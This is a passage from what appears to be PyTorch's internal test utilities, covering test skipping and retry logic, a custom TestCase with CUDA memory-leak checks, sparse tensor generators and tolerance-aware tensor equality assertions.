suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Failed to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU nor CUDA device types
# support the needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
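# Illustrative sketch of the remapping above (hypothetical CPU tensors):
#
#   a = torch.ones(2, dtype=torch.bfloat16)
#   b = torch.ones(2, dtype=torch.float16)
#   get_comparison_dtype(a, b)   # -> torch.float32, since bfloat16 is remapped to float32
#                                #    before promotion and float16 is avoided off-CUDA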
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
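# Illustrative sketch of set_warn_always_context; `op_that_warns_once` is hypothetical:
#
#   with set_warn_always_context(True):
#       with warnings.catch_warnings(record=True) as ws:
#           warnings.simplefilter("always")
#           op_that_warns_once()   # TORCH_WARN_ONCE warnings fire on every call here
#   # torch.is_warn_always_enabled() is restored to its previous value on exit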
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# A CUDA device-side error will cause subsequent test cases to fail.
# Stop the entire test suite if we catch a RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python exceptions (e.g., unittest.Skip) keep objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
where counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built up
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz constraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appears to give exact results for all x values
# less than 2**35; the exact upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
low = -1 if dtype != torch.uint8 else 0
high = 1 if dtype != torch.uint8 else 2
values = make_tensor([nnz], device=device, dtype=dtype, low=low, high=high)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert we are not given an impossible combination, where the sparse dims have
# empty numel, but nnz > 0 would require the indices to contain values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
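    # Hypothetical usage from a test method, comparing an elementwise op against
    # its NumPy reference on a tensor `t` (names here are illustrative only):
    #   self.compare_with_numpy(torch.sin, np.sin, t)
    #   self.compare_with_numpy(lambda x: torch.clamp(x, 0., 1.),
    #                           lambda a: np.clip(a, 0., 1.), t)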
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
    # Construct assert messages based on the internal debug message and the user-provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
        # If you see this function used, the test is likely written incorrectly
        # and deserves detailed investigation.
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None, "left arg is not None while right arg is None")
self.assertTrue(y is None, "left arg is None while right arg not is None")
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
        # This API is used to simulate the deprecated x.type() == y.type() comparison
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
